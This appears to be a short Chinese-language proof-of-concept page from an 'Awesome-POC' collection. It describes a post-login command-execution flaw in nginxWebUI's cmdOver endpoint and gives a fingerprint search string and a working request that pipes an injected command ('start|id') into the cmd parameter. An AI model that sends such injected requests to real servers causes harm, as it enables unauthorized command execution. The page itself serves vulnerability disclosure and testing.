Awesome-POC/Web应用漏洞/nginxWebUI cmdOver 后台命令执行漏洞.md

35 lines
505 B
Markdown
Raw Normal View History

# nginxWebUI cmdOver 后台命令执行漏洞
## 漏洞描述
nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限
## 漏洞影响
```
nginxWebUI
```
2023-08-28 15:55:36 +08:00
## 网络测绘
```
title="nginxwebui"
```
## 漏洞复现
登录页面
2022-12-05 11:09:28 +08:00
![image-20220628112638269](./images/202206281126396.png)
验证请求包
```
POST /adminPage/remote/cmdOver
remoteId=local&cmd=start|id&interval=1
```
2022-12-05 11:09:28 +08:00
![image-20220628112938342](./images/202206281129491.png)